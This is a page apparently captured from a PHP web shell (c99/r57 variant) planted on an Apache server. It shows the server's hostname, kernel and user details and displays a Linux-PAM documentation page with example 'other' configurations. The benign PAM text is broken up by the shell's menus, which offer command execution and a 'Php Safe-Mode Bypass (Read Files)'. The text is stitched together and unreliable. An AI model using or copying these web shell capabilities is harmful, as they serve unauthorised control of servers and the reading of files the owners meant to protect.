Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/share/doc/pam-0.99.6.2/html/ drwxr-xr-x |
Viewing file: sag-configuration-example.html (5.37 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | In this section, we give some examples of entries that can be present in the Linux-PAM configuration file. As a first attempt at configuring your system you could do worse than to implement these. If a system is to be considered secure, it had better have a reasonably secure 'other entry. The following is a paranoid setting (which is not a bad place to start!): # # default; deny access # other auth required pam_deny.so other account required pam_deny.so other password required pam_deny.so other session required pam_deny.so Whilst fundamentally a secure default, this is not very sympathetic to a misconfigured system. For example, such a system is vulnerable to locking everyone out should the rest of the file become badly written. The module pam_deny (documented in a later section) is not very sophisticated. For example, it logs no information when it is invoked so unless the users of a system contact the administrator when failing to execute a service application, the administrator may go for a long while in ignorance of the fact that his system is misconfigured. The addition of the following line before those in the above example would provide a suitable warning to the administrator. # # default; wake up! This application is not configured # other auth required pam_warn.so other password required pam_warn.so Having two 'other auth' lines is an example of stacking.
On a system that uses the # # default configuration: /etc/pam.d/other # auth required pam_warn.so auth required pam_deny.so account required pam_deny.so password required pam_warn.so password required pam_deny.so session required pam_deny.so
This is the only explicit example we give for an
On a less sensitive computer, one on which the system
administrator wishes to remain ignorant of much of the
power of Linux-PAM, the
following selection of lines (in
# # default; standard UN*X access # auth required pam_unix.so account required pam_unix.so password required pam_unix.so session required pam_unix.so In general this will provide a starting place for most applications. |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0097 ]-- |